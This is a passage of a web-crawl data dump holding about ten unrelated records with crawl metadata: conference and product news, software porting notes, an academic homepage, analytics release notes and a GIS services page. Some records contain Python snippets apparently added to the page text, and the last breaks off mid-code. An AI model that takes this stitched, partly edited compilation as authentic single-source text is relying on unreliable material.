1. Euler Diagrams, Brighton, UK, September 22-23 2004. http://www.cs.kent.ac.uk/events/conf/2004/euler/eulerdiagrams.html (retrieved 13 August 2008; cited 09-06-2009)
2. http://en.wikipedia.org/wiki/Euler_diagram (accessed 09-06-2009)
3. http://www.cs.kent.ac.uk/events/conf/2004/euler/eulerdiagrams.html (accessed 09-06-2009)
DESH RAJ SIRSWAL
Note: due to some problems the diagrams are not shown in the text; go to the references for details.
Last Updated: 30-04-2011
systems_science
https://topwebnews.org/hac-aldine-2023-a-glimpse-into-the-future/
2023-12-02T08:35:36
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100381.14/warc/CC-MAIN-20231202073445-20231202103445-00105.warc.gz
0.910749
445
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__67996108
en
As we enter the latter part of 2023, the HAC Aldine conference showcased the latest innovations, trends, and insights shaping the future. This year’s event was spectacular, with industry leaders, tech enthusiasts, and visionaries coming together to share their knowledge and predictions. Let’s dive into the highlights of HAC Aldine 2023.
HAC Aldine: The Rise of Quantum Computing
Quantum computing took center stage at HAC Aldine. With advancements in qubit stability and quantum algorithms, experts predict that we are on the brink of a new era where quantum computers will outperform classical computers in numerous tasks, from cryptography to drug discovery.
Sustainable Tech: More Than Just a Buzzword
The emphasis on sustainability was evident throughout the conference. From eco-friendly gadgets to energy-efficient data centers, the tech industry is making significant strides in reducing its carbon footprint and promoting a more sustainable future.
Augmented Reality (AR) & Virtual Reality (VR): Merging Worlds
AR and VR technologies have matured significantly over the past few years. At HAC Aldine, we saw demonstrations of immersive educational experiences, virtual tourism, and even AR-enhanced surgeries. The potential applications are limitless, and the line between our physical and virtual worlds is increasingly thin.
The Age of Autonomous Vehicles
Self-driving cars are no longer just prototypes on test tracks. They’re becoming a part of our daily lives. HAC Aldine showcased the latest in autonomous vehicle technology, emphasizing safety, efficiency, and the potential to revolutionize urban transportation.
AI Ethics: Navigating the Moral Labyrinth
With the rapid advancements in artificial intelligence, ethical considerations have emerged. Panels at HAC Aldine discussed the importance of transparency, fairness, and accountability in AI systems, emphasizing the need for a human-centric approach.
HAC Aldine 2023 was a testament to the incredible pace of technological advancement. As we look forward to the innovations and challenges the future holds, one thing is clear: technology will continue to shape our world in ways we can only begin to imagine. The key will be to harness its potential responsibly, ensuring a brighter future for all.
systems_science
https://berry.readthedocs.io/en/latest/source/en/Appendix-B.html
2024-02-21T11:29:15
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947473472.21/warc/CC-MAIN-20240221102433-20240221132433-00534.warc.gz
0.85707
445
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__145600931
en
The source code of the Berry interpreter is written using the ISO C99 standard, and the core code does not rely on third-party libraries, so it is highly portable. Taking the Ubuntu system as an example, execute the following commands in the terminal to install the build dependencies and fetch the Berry interpreter:
apt install git gcc g++ make libreadline-dev
git clone https://github.com/berry-lang/berry
The Makefile provided in the GitHub repository builds with the GCC compiler, but other compilers can also compile the Berry interpreter correctly; the currently tested and available compilers include GCC, Clang, MSVC, ARMCC and ICCARM. The compiler used to build the Berry interpreter should have the following characteristics:
- a C compiler that supports the C99 standard
- a C++ compiler supporting the C++11 standard (only for native compilation)
- a 32- or 64-bit target platform
The C++ compiler is only used to compile the map_build tool, so there is no need to provide a C++ cross compiler for the Berry interpreter when cross-compiling, but the user should prepare a native C++ compiler (unless the user can obtain the map_build tool executable file).
To port the Berry interpreter to the user’s project:
- Add all source files in the src directory to the user project, and add that directory to the include path.
- Implement the files in the default directory (other than berry.c) yourself; where conditions permit, they can be used without modification.
- Use the map_build tool to generate the constant object code and then compile.
3. Platform Support
Currently, the Berry interpreter has been tested on several platforms. Windows, Linux and MacOS operating systems running on X86 CPUs work normally. Embedded platforms that have been tested include Cortex M3/M0/M4/M7. The Berry interpreter should run well given only the necessary C runtime library. At present, when only the Berry language core is compiled, the interpreter code generated by the ARMCC compiler is only about 40KiB, and the interpreter can run on a device with only 8KiB of RAM.
systems_science
https://extraordinaryadvisors.com/2018/10/
2023-12-05T02:29:33
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100540.62/warc/CC-MAIN-20231205010358-20231205040358-00749.warc.gz
0.91206
1,567
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__216760399
en
Recently, I was fortunate to see a speech from futurist Peter Diamandis. He spoke about what the future world of work would be like, and specifically talked about the workforce within manufacturing. It’s about to be transformed. Old constraints such as specialization in manufacturing skill set and tooling are going away, new technologies are being added rapidly, and the type of employee needed in manufacturing is going to drastically change, according to Diamandis. New technological capabilities will enable manufacturers to customize everything while turning consumers into inventors. And as price points decline while accessibility increases, manufacturing juggernauts and early-stage startups alike have infinite possibilities ahead.
Three Major Shifts
3-D printing farms, smart factories, and autonomous co-bots will turn concepts into commodities overnight. There are about to be three major paradigm shifts:
1. Mass customization: Fixed costs will begin to reach variable costs in the production sphere, meaning companies will no longer fabricate millions of the same product or part. Customer data-driven design will allow for cost-effective, tailor-made commodities and one-off production items.
2. Democratized Invention: Incubator studios and fabrication equipment labs are jumping onto the scene. Flaunting AI-aided robots and swarm 3-D printers that work overnight, these urban workshops basically serve as new testing grounds — the physical hands for digital designs. Whether in-house or entirely outsourced, design-to-production technologies allow anyone to invent. This will eliminate operational costs, fabrication equipment, prototyping, tooling, and far-flung production plants.
3. Smart and Autonomous Factories: Industrial IoT (IIoT) and smart factories are ushering in a new era of autonomous production, severely reducing recalls and freeing corporations to expand product lines.
Let’s examine each further.
Technological convergence will soon allow startups and corporations alike to personalize products at an unparalleled scale. Artificial intelligence (AI) will go from merely automating production to custom configuring products to meet individual demands. The greatest game-changer of customized manufacturing at scale is 3-D printing. Previously a niche and prohibitively priced tool, 3-D printing is hitting its exponential growth phase, says Diamandis. By 2021, IDC analysts expect 3-D printing global spending to be nearly $20 billion. With newly accessible design software, companies can customize products such as personalized dentistry products, adapted airplane and auto parts, or microscale fabrication products such as sensors, drug delivery technologies, and lab-on-a-chip applications. MX3D, a Dutch company, is using its six-axis robotic arms to 3-D print the Arc Bicycle, a futuristic bike with a steel lattice frame. Potentially the greatest breakthrough in its manufacturing process is MX3D’s multiple-axis printing capability, which enables printing from any direction in mid-air. While conventional 3-D printing requires some form of support for objects as they’re printed, multi-axis printing technologies almost entirely eliminate this dependency, opening up incredible new structural possibilities. Smart products and electronics no longer have to be manually embedded with circuitry. Using a wide array of conductive inks, manufacturers can print circuitry directly into their products all at one time.
With high thermal stability and at only a few microns thick, evolving conductive inks have the potential to revolutionize hardware production. Cost-effective 3-D printing takes manufacturers directly from design to production, eliminating lengthy design processes, multi-stage prototyping, tooling costs, and mass production, where design becomes adaptable and production is expedited. With Democratized platforms, everyone can be an inventor via newly accessible CAD-like design software and easy-to-use interfaces. New hardware studios and accelerators are springing up daily, eager to collaborate with digital startups and designers by providing the physical building space and manufacturing capacity for now unencumbered entrepreneurs. This allows any manufacturer wanting to build any product to become completely dematerialized. Companies like Playground Global want to take care of material constraints like engineering, fabrication, supply chain management, and distribution. Large companies like 3D Systems and Stratasys are also embracing distributed manufacturing. With its Continuous Build 3D Demonstrator, Stratasys supplies 3-D printers that work simultaneously and are centrally controlled through a cloud-based architecture. With some three billion new minds joining the web as internet connectivity blankets the earth, now we can ask: what will today’s new inventors build? Crowdfunding sources like Kickstarter look to give entrepreneurs a leg up through initial finance. As distributed manufacturing converges with the plunging costs of automated fabrication, we are about to see an explosion of innovative design. Smart and Autonomous Factories For established corporations with high production quotas, industrial IoT, AI, collaborative bots, and new technologies like Li-Fi, are the next frontier. Manufacturers are now using the Internet of Things, whereby device connectivity allows smart products to communicate seamlessly and automate cumbersome tasks. With new sensors, ML tools, and inspection drones coming onto the market, not only can manufacturing equipment correct for errors instantaneously, but production will conform to changing demands in real-time. Smart factories will manufacture smart products through machine-to-machine (M2M) communication with data transfer between smart bots, with the goal of adapting to workflows in real-time. Aiming to eliminate the risk of recalls — one of the most costly and dreaded catastrophes for big manufacturers — AI is coming to the rescue. Landing.ai now produces machine-vision tools that can find microscopic defects in circuit boards and products hidden from our visual range. With precise on-site quality analysis, errors are communicated immediately, and IIoT-connected machinery can halt any output before it ever becomes a liability. But what about defective machinery? As predictive analytics are engineered to near perfection, machine learning techniques can detect abnormalities and risky indicators long before they cause issues. Yet as cloud-connected, collaborative machines begin managing themselves, what’s to stop fully automated factories operating in the dark or without heat? Potentially nothing. Voodoo Manufacturing is massively disrupting 24/7/365 production with Project Skywalker. Geared with nine mounted 3-D printers and a huge robotic arm, Voodoo’s 3-D printing farms incessantly print parts, and a Universal Robots UR10 arm unloads products as instructed. 
In the near future, Voodoo estimates that a single-arm will be capable of tending to approximately 100 printers. Diamandis sees a staggering convergence of 3-D printers, collaborative 3-D printing farms, co-robots, robots that manage 3-D printers, 3-D printers that build robots… and this is just the beginning. Smart sensors now convert data, communicate with fabrication machines, and turn off devices when performance or safety is at stake. IIoT allows us to analyze production quotas, do predictive maintenance, and input designs remotely. Although many fear the job market losses caused by purely automated and smart manufacturing, democratized tools and dematerialized companies will allow anyone a shot at invention. This means an upsurge of self-employed, creative minds building needed products; on-demand personalized commodities built at record speed; and an economic boom of unprecedented dimensions. We’ve seen a skyrocketing software industry bringing millions of jobs and brilliant services to our economy. As physical constraints to fabrication disappear and design platforms abound, we are on the verge of a second boom.
systems_science
https://rahman.eng.fiu.edu/
2022-08-20T06:29:56
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573908.30/warc/CC-MAIN-20220820043108-20220820073108-00738.warc.gz
0.922859
2,637
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__62282413
en
I am an Assistant Professor in the Department of Electrical and Computer Engineering at Florida International University. I joined FIU in Spring 2019. Before joining FIU, I was an Assistant Professor in the Department of Computer Science at Tennessee Tech University. I obtained a Ph.D. degree in computing and information systems from the University of North Carolina at Charlotte in 2015 under the supervision of Prof. Ehab Al-Shaer. Previously, I received BS and MS degrees in computer science and engineering from Bangladesh University of Engineering and Technology (BUET), Dhaka, in 2004 and 2007, respectively. I lead the Analytics of Cyber Defense (ACyD) Lab at FIU. I am a senior member of IEEE and a member of ACM. You can see my curriculum vitae for further information. Email: marahman [at] fiu [dot] edu Office: EC 3955, Engineering Center My primary research interest covers a wide area of computer networks and communications, within both cyber and cyber-physical systems (CPS)/Internet of Things (IoT). My research focus primarily includes: - Computer and information security analysis - Control loop security analysis - Risk assessment and security design - Resiliency analysis and hardening - Secure and dependable resource allocation In my research, I primarily apply formal methods, artificial intelligence, and game theory. The students should be comfortable with programming, algorithms, and logic, and should have received a BS/MS with a major in Computer Science/Engineering or Electrical/Communication Engineering. Preferred qualities include scholarly publications, especially in cybersecurity, IoT/CPS, or adversarial machine learning. For further information, please go here. News & Events - [June 2022] I am visiting Griffiss Institute/Air Force Research Lab (AFRL) in Rome, NY on a Visiting Faculty Research Program (VFRP) fellowship. - [May 2022] Our paper titled “Optimal Improvement of Post-Disturbance Dynamic Response in Power Grids” has been accepted for presentation at the IEEE Industry Applications Society Annual Meeting (IASAM) 2022. - [May 2022] Two of our papers titled “DeepCAD: A Stand-alone Deep Neural Network-based Framework for Classification and Anomaly Detection in Smart Healthcare Systems” and “PHASE: Security Analyzer for Next Generation Smart Personalized Smart Healthcare System” have been accepted to be published in the IEEE International Conference on Digital Health (ICDH 2022). The acceptance rate is around 25%. - [April 2022] I have received a $2M Department of Energy (DOE) award to enhance the cybersecurity of America’s energy systems. Along with multiple Co-PIs at FIU, I partnered with collaborators at NCSU, UNC Charlotte, Raytheon Technologies, and Duke Energy in this project. - [April 2022] I hosted a delegation from Bangladesh Energy and Power Research Council (BEPRC) on April 25th, 2022. The team was led by Mr. Satyajit Karmaker, Chairman, BEPRC. - [March 2022] I am serving as the TPC Co-Chair of the IEEE/IFIP Network Operations and Management Symposium (NOMS) 2023, which will be held in Miami. - [March 2022] Our collaborative work titled “A Security Enforcement Framework for SDN Controller using Game Theoretic Approach” has been accepted in IEEE Transactions on Dependable and Secure Computing (TDSC). - [January 2022] Our collaborative work titled “On Algorand Transaction Fee: Challenges and Mechanism Design” has been accepted in the IEEE International Conference on Communications (ICC) 2022. - [December 2021] We have successfully completed the NSF I-Corps program.
Congratulations to Entrepreneur Leads Imtiaz and Alvi and Industry Mentor Chris! - [December 2021] Mohamadsaleh Jafari (Saleh) has successfully defended his dissertation titled “Impact-based Analytics of Cascaded False Data Injection Attacks on Smart Grids.” Congratulations to Dr. Jafari! - [October 2021] Our paper titled “Ride-Hailing for Autonomous Vehicles: Hyperledger Fabric-Based Secure and Decentralized Blockchain Platform” is accepted in the IEEE International Conference on Big Data (BigData 2021). - [September 2021] As a Co-PI, I have received a DOE grant titled “Consortium for Research and Education in Power and Energy Systems (CREPES) for Sustainable STEM Workforce.” - [September 2021] As a Co-PI, I have received an NSA grant titled “Automated Risk Detection and Mitigation of Devices and Apps in Smart Settings.” - [August 2021] I have received an NSF I-Corps award for exploring the implementation and commercialization of security analytics for smart healthcare systems. - [August 2021] Our paper titled “iAttackGen: Generative Synthesis of False Data Injection Attacks in Cyber-physical Systems” got accepted to be published in the 9th IEEE Conference on Communications and Network Security (CNS 2021). The acceptance rate is around 28%. - [August 2021] I am serving on the TPC of IEEE Blockchain 2021. - [July 2021] Our paper titled “BIOCAD: Bio-Inspired Optimization for Classification and Anomaly Detection in Digital Healthcare Systems” is accepted to be published in the IEEE International Conference on Digital Health (ICDH 2021). The acceptance rate is around 20%. - [July 2021] I am serving on the TPC of IEEE ICC 2022. - [June 2021] Our paper titled “CURE: Enabling RF Energy Harvesting using Cell-Free Massive MIMO UAVs Assisted by RIS” is accepted to be published in the doctoral track of the IEEE 46th Conference on Local Computer Networks (LCN 2021). - [May 2021] Our paper titled “iDDAF: An Intelligent Deceptive Data Acquisition Framework for Secure Cyber-physical Systems” is accepted to be published in the 17th EAI International Conference on Security and Privacy in Communication Networks (SecureComm 2021). - [May 2021] Our paper titled “REPlanner: Efficient UAV Trajectory-Planning using Economic Reinforcement Learning” is accepted to be published in the 7th IEEE International Conference on Smart Computing (SMARTCOMP 2021). - [April 2021] Our paper titled “BIoTA: Control-Aware Attack Analytics for Building Internet of Things” is accepted to be published in the 18th IEEE International Conference on Sensing, Communication, and Networking (SECON 2021). The acceptance rate is around 26%. Congratulations to Imtiaz! - [April 2021] Our two papers have been accepted to be published in the 45th IEEE Computer Society International Conference on Computers, Software, and Applications (COMPSAC 2021). The acceptance rate is just 27%. The titles of these papers are “DDAF: Deceptive Data Acquisition Framework against Stealthy Attacks in Cyber-Physical Systems” and “Ensemble-based Efficient Anomaly Detection for Smart Building Control Systems.” - [March 2021] Our collaborative paper titled “PrivacyGuard: Enhancing Smart Home User Privacy” is accepted to be published at the ACM/IEEE International Conference on Information Processing in Sensor Networks (IPSN 2021). The acceptance rate is 25%. - [February 2021] Our two papers have been accepted to be published in IEEE PES General Meeting 2021. 
One of the papers is about false data injection attacks against power system small-signal stability, while another one presents false relay operation attacks in power systems with high renewables. - [February 2021] Our collaborative survey paper titled “A Survey on Security and Privacy Issues in Modern Healthcare Systems: Attacks and Defenses” is accepted to be published in ACM Transactions on Computing for Healthcare. - [January 2021] I am serving on the TPC of IEEE COMPSAC 2021. - [January 2021] Our paper titled “Resiliency-Aware Deployment of SDN in Smart Grid SCADA: A Formal Synthesis Model” has been accepted to be published in IEEE Transactions on Network and Service Management (TNSM). - [January 2021] Our paper titled “Strategic Defense against Stealthy Link Flooding Attacks: A Signaling Game Approach” has been accepted to be published in Transactions on Network Science and Engineering (TNSE). [December 2020] I am serving on the TPCs of the Conference on Blockchain Research & Applications for Innovative Networks and Services (BRAINS) 2021. [December 2020] I am serving as the Program Co-Chair of IEEE STPSA, a workshop in conjunction with IEEE COMPSAC 2021. [December 2020] Shahriar has successfully defended his MS thesis. [August 2020] Our paper on the UAV trajectory design for continuous and resilient surveillance has been accepted in the 25th International Conference on Engineering of Complex Computer Systems (ICECCS 2020). The acceptance rate is 25%. [June 2020] I am serving on the TPC of the IEEE International Conference on Communications (ICC) 2021. [June 2020] I received an REU Supplement ($21,000) on my NSF CRII grant. This grant will be used to support three undergraduate students at FIU to conduct research in CPS/IoT security. [April 2020] A H M Jakaria, my student at Tennessee Tech, has successfully defended his dissertation. Congratulations, Dr. Jakaria! He already accepted and joined Electric Power Research Institute (EPRI), Knoxville, as a Senior Engineer/Scientist. [April 2020] Two papers from my research group have been accepted to be published in the 44th IEEE Computer Society International Conference on Computers, Software, and Applications (COMPSAC 2020). The acceptance rate is just below 24%. The title of these papers are “G-IDS: Generative Adversarial Networks assisted Intrusion Detection System” and “WTC2: Impact-Aware Threat Analysis for Water Treatment Centers.” [March 2020] The paper titled “On Incentive Compatible Role-based Reward Distribution in Algorand” has been accepted to be published in the 50th IEEE/IFIP International Conference on Dependable Systems and Networks (DSN 2020). The acceptance rate is 16.5%. [January 2020] I am serving as a Program Co-Chair of CPS-Sec, a workshop to be held in conjunction with IEEE CNS 2020. [December 2019] I am serving as the Program Co-Chair of IEEE STPSA, a workshop in conjunction with IEEE COMPSAC 2020. [December 2019] Our collaborative work on load balancing for SDN controllers is published in Elsevier Computer Networks. [October 2019] I am serving as a Review Editor of Frontiers in Smart Grids. [August 2019] I am serving as an editor of EAI Transactions on Safety and Security. [July 2019] I have given a talk on invasive and non-invasive analysis of IoT security at IEEE ISVLSI 2019. [June 2019] I am serving on the Program Committee of MILCOM 2019. 
[May 2019] Our paper titled “A Requirement-Oriented Design of NFV Topology by Formal Synthesis” has been accepted to be published in IEEE Transactions on Network and Service Management (TNSM). [May 2019] I have participated as a speaker in a panel on the “Internet of Things” at IEEE PELS CyberPELS Workshop 2019. [April 2019] ARO provides $10,000 to support ACM WiSec 2019’s travel grant program. [April 2019] Two papers from our group have been accepted to be published in IEEE COMPSAC 2019. [April 2019] Rahat, Ryan, and Brian have successfully defended their MS theses on April 04. Sam also defended his project on the same day. Congratulations to all! [March 2019] Our paper on power system security is accepted/published in Elsevier Computer & Security. [February 2019] I am serving on the Program Committee of IEEE CNSM 2019. [January 2019] I am serving as the Local Chair of ACM WiSec 2019 to be held in Miami from May 15 – 17, 2019.
systems_science
https://www.voloagency.com/google-analytics-4/
2024-02-27T00:28:14
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474669.36/warc/CC-MAIN-20240226225941-20240227015941-00606.warc.gz
0.937235
187
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__189267985
en
In today’s digital landscape, one thing is certain: businesses and brands need to navigate new challenges to understand the complex, multi-platform journeys of their clients. So what is different in Google’s new version of its analytics platform, Google Analytics 4 (GA4)?
- GA4 makes use of a significantly different data structure and data collection logic.
- Everything is now built around users and events instead of sessions, as it was in the past.
- An events-based model processes each user interaction as a standalone event.
The last part is significant, since we historically used to rely on a session-based model which grouped user interactions within a given time frame. Changing the focus from sessions towards events provides significant benefits to marketers, such as cross-platform analysis and further enhanced capacity for pathing analysis. By switching to an event-based model, Google Analytics 4 is even more flexible and better able to predict user behavior.
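The difference between the two models can be sketched in a few lines of plain Python (this is an illustration of the concept, not the GA4 API, and the 30-minute inactivity window is just the conventional default used in older, session-based analytics):

```python
from datetime import datetime, timedelta

# Raw interactions for one user: in an event-based model, each of these is
# already a standalone, analysable record.
events = [
    {"name": "page_view",   "ts": datetime(2023, 5, 1, 9, 0)},
    {"name": "add_to_cart", "ts": datetime(2023, 5, 1, 9, 10)},
    {"name": "page_view",   "ts": datetime(2023, 5, 1, 14, 3)},   # hours later
    {"name": "purchase",    "ts": datetime(2023, 5, 1, 14, 9)},
]

def sessionize(events, gap=timedelta(minutes=30)):
    """Classic session-based grouping: a new session starts after 30 min of inactivity."""
    sessions, current = [], []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if current and ev["ts"] - current[-1]["ts"] > gap:
            sessions.append(current)
            current = []
        current.append(ev)
    if current:
        sessions.append(current)
    return sessions

print(len(events), "events")                 # event model: 4 records
print(len(sessionize(events)), "sessions")   # session model: 2 groups
```

Because the event-based view never throws away the individual interactions, the same data can later be re-grouped per user, per device or per journey, which is what enables the cross-platform and pathing analysis mentioned above.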
systems_science
https://swarm-analytics.com/release-of-v2023-2/
2023-09-25T20:27:17
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510085.26/warc/CC-MAIN-20230925183615-20230925213615-00050.warc.gz
0.914114
985
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__36949460
en
New Classes: E-Scooters and Trams
The traffic sector is constantly evolving, and it’s crucial for our technology to keep pace in order to not only ensure our solution’s quality, but also to provide safe and efficient mobility analysis options. The increasing popularity of e-scooters for various reasons has led to their growing prevalence on our streets. By integrating e-scooters as a class into our models, we can detect their presence and contribute to improving our product’s quality even further. Additionally, trams are an important and vital form of public transportation in many cities, reducing individual traffic and improving overall efficiency. By incorporating the tram class into our technology, we are able to analyze tram behavior and contribute to more efficient traffic analysis and management.
We are still thrilled to announce the Early Availability of the new hosting service for our Control Center! As already mentioned in our previous mailing, Multi-Tenancy hosting is aimed at providing an even more seamless and efficient experience for your business. Let’s check out how this will be accomplished:
Efficient Use of Cloud Resources
Our Multi-Tenancy hosting solution ensures the efficient allocation and utilization of cloud resources, resulting in smooth and fast platform operation. By optimizing resource allocation, we guarantee an enhanced user experience with improved response times and increased overall system performance. All this ensures that we can maintain our competitive pricing in the future.
We understand that different user groups may require varying levels of access and dedicated resources. With our updated Multi-Tenancy hosting, you have the option to request smaller sub-instances, tailoring access and resources to specific user groups. This capability enables you to provide your customers with access to our Swarm Control Center and therefore enables you to resell the Swarm solution more efficiently and scale up without any blocking points.
Isolated Data Storage
Your data belongs to you and will never be shared. Our multi-tenant hosting architecture ensures that data is stored and managed per sub-instance - so there will be no changes in terms of data separation and control. Each sub-instance benefits from isolated data storage, providing strict data security and privacy. Moreover, this isolated storage enables us to offer our powerful data analytics features specifically tailored to each sub-instance, allowing your customers to gain valuable insights and make data-driven decisions.
User and Role Management
The user and role management process will be maintained for each sub-instance. This granular user access capability allows you to request different roles for users in different sub-instances.
What does this mean for you?
We would like to highlight that these enhancements represent just the first step towards an even more effortless and comprehensive update process. In the near future, we will be introducing a staged rollout option, which will further simplify the process of updating your instances. This will ensure a seamless transition and minimize any disruption to your operations during updates, guaranteeing a smooth and uninterrupted experience. The Multi-Tenancy hosting is not a prerequisite for the update to version 2023.2, so we are starting the migration process step by step, and we will come back to you with a proposed migration date and coordinate it closely together with you.
Administration Interface: Subscription Overview and License Management
In the Administration Interface, we introduce license management designed to provide you with a comprehensive overview of your purchased licenses. This interface offers essential information, including order numbers, invoice numbers, and license periods, ensuring efficient management of your licenses.
AI Models: Traffic Model Stability and Robustness
In this release, we have focused on improving model stability and robustness, particularly in varying weather conditions, by reworking the augmentations in our model training. On top of that, the model was improved on a blind spot for certain object sizes that was found in detailed analysis. So you can expect the traffic models to run even more stably and deliver accurate figures. Additionally, we have conducted experiments to provide insights on model accuracy over time in your installations. These advancements ensure reliable performance and increased confidence in our solutions. We are committed to delivering optimal results and look forward to elevating your experience with our enhanced offerings.
Virtual Perception License: Time for NVIDIA New Gen
As an Early Availability feature, our software now runs on the latest NVIDIA JetPack 5 version. This enables you to run the Swarm Perception Subscription on the new generation of the NVIDIA Jetson series (Orin), so you can process even more streams on one edge device in the case of VPX installations.
As always: if you have any questions, do not hesitate to contact us at any time. Best regards from Innsbruck, your Swarm Analytics team.
Last but not least: as usual, we offered an online live demo for this release.
systems_science
http://www.microtech.co.gg/articles.php?item=1192&rss=rss=/mtgsynews.xml
2017-04-24T15:18:17
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917119637.34/warc/CC-MAIN-20170423031159-00254-ip-10-145-167-34.ec2.internal.warc.gz
0.936588
167
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__144900596
en
WALTHAM, MA--(Marketwire - Feb 14, 2012) - CloudFloor DNS, the leading international provider of managed DNS and domain name services, announced that they have greatly improved their NetMon capabilities and have implemented several key back-end improvements to benefit customers. These capabilities will greatly reduce failover response and alert time, saving customers valuable time and money. Included in the improvements is a new multi-threaded testing engine deployed on all NetMon nodes. This new testing engine is significantly faster than the old monitoring scripts. The new multi-threaded approach runs many tests simultaneously and now uses a pool of "master" servers to retrieve XML data detailing the tests to be performed, instead of a direct database connection. This translates into faster, more resilient, and more efficient performance. Read the entire announcement here.
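The announcement does not include code; the sketch below (Python, with an invented check list and public placeholder URLs) only illustrates the general pattern such a multi-threaded testing engine follows: pull a batch of test definitions, then run the probes concurrently rather than one after another.

```python
from concurrent.futures import ThreadPoolExecutor
from urllib.request import urlopen
import time

# Stand-in for the test definitions a monitoring node would pull from a master server.
checks = [
    {"name": "www", "url": "https://example.com/"},
    {"name": "api", "url": "https://example.org/"},
]

def run_check(check, timeout=5):
    """Probe one endpoint and report status plus response time."""
    start = time.monotonic()
    try:
        with urlopen(check["url"], timeout=timeout) as resp:
            ok = 200 <= resp.status < 400
    except OSError:                      # DNS failure, timeout, connection reset, ...
        ok = False
    return check["name"], ok, time.monotonic() - start

# Running many tests simultaneously is what shortens failover detection and alert time.
with ThreadPoolExecutor(max_workers=10) as pool:
    for name, ok, elapsed in pool.map(run_check, checks):
        print(f"{name}: {'UP' if ok else 'DOWN'} ({elapsed:.2f}s)")
```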
systems_science
https://nortridgeuserguide.netlify.app/topics/virtual-system-date.html
2021-06-24T06:43:19
s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623488551052.94/warc/CC-MAIN-20210624045834-20210624075834-00086.warc.gz
0.723654
143
CC-MAIN-2021-25
webtext-fineweb__CC-MAIN-2021-25__0__64637236
en
Virtual System Date
This feature is available in NLS 4.9.3 and later.
Note: This feature is only available to users with admin privileges.
Admin users and users with the DBA flag selected can set a virtual system date for testing cycles that may require time travel operations. To access this feature, select File > Virtual System Date. Click Set Virtual System Date, then either enter the new date to use or select a new date from the popup calendar. NLS will now use the virtual date as the current date and base all of its calculations and functions on this date. To return to using the actual system date, click Stop Virtual System Date or close the Virtual System Date dialog.
systems_science
http://crr.ugent.be/programs-data/vwr
2017-04-27T09:04:59
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917122041.70/warc/CC-MAIN-20170423031202-00236-ip-10-145-167-34.ec2.internal.warc.gz
0.924102
230
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__37963844
en
Vwr is an R package to assist in computations often needed in visual word recognition research. As the package is listed on CRAN, it can be installed like any other official package from within R. The manual for the package can be found here. Vwr includes functions to:
- Compute Levenshtein distances between strings
- Compute Hamming distances (overlap distance) between strings
- Compute neighbors based on the Levenshtein and Hamming distance
- Compute Coltheart’s N and average Levenshtein distances (e.g., Yarkoni et al.’s OLD20 measure).
These functions run in parallel on multiple cores and offer a major speed advantage when computing these values for large lists of words. The package also includes the ldknn algorithm, a method that we recently proposed to examine how balanced a lexical decision task is (i.e., how easy it is to discriminate the words from the nonwords in an experiment given no other information than the stimuli in the experiment). A preliminary version of that paper can be found here.
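For readers who do not use R, the idea behind the OLD20 measure the package computes can be sketched in a few lines of Python. This shows only the concept (mean edit distance to the closest neighbours); the vwr package's own functions, their names and their parallel implementation are in R and may differ.

```python
from heapq import nsmallest

def levenshtein(a, b):
    """Standard dynamic-programming edit distance (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            curr.append(min(prev[j] + 1,                  # deletion
                            curr[j - 1] + 1,              # insertion
                            prev[j - 1] + (ca != cb)))    # substitution
        prev = curr
    return prev[-1]

def oldn(word, lexicon, n=20):
    """Mean Levenshtein distance from `word` to its n closest lexicon entries (OLD20 when n=20)."""
    distances = (levenshtein(word, other) for other in lexicon if other != word)
    closest = nsmallest(n, distances)
    return sum(closest) / len(closest)

lexicon = ["cot", "coat", "cast", "cart", "chat", "rat", "bat", "car", "cut"]
print(oldn("cat", lexicon, n=5))   # average distance to the 5 nearest neighbours
```

Computing this for tens of thousands of words is quadratic in the size of the lexicon, which is why the package's parallel, multi-core implementation matters in practice.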
systems_science
http://www.gobeconsultants.com/service/gis-and-data-management/
2019-12-13T10:37:41
s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540553486.23/warc/CC-MAIN-20191213094833-20191213122833-00460.warc.gz
0.906129
162
CC-MAIN-2019-51
webtext-fineweb__CC-MAIN-2019-51__0__55779213
en
Staff are skilled at data visualisation and figure production and often utilise bespoke tools and scripts to efficiently perform complex analysis tasks, such as multicriteria analysis for site selection studies. Along with providing data management services which meet industry standards, GoBe also maintain an extensive library of spatial datasets collated over years of working with both onshore and offshore environmental and survey data. With a thorough understanding of data formats, metadata processes and industry requirements GoBe are able to offer a GIS service which meets the needs of clients involved in a diverse range of projects. Our GIS expertise includes: - Data management - Data processing and conversion - Data visualisation and figure production - Site selection studies - Constraints mapping - Multicriteria analysis - Viewshed analysis
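A multicriteria analysis for site selection of the kind mentioned above usually reduces to a weighted overlay of normalised criterion layers. The sketch below shows that core step with made-up layers and weights; it is the common GIS pattern rather than GoBe's specific workflow.

```python
import numpy as np

def weighted_suitability(criteria, weights, exclusions=None):
    """Weighted-overlay multicriteria analysis on gridded criterion layers.

    criteria   : dict of name -> 2-D array, each already scaled so that higher
                 values mean "more suitable"
    weights    : dict of name -> relative weight (normalised to sum to 1 here)
    exclusions : optional boolean mask of absolutely excluded cells
    """
    total = sum(weights.values())
    score = sum((w / total) * criteria[name] for name, w in weights.items())
    if exclusions is not None:
        score = np.where(exclusions, np.nan, score)   # hard constraints
    return score

# Toy 3x3 example: two criteria plus an exclusion zone (e.g. a protected habitat cell).
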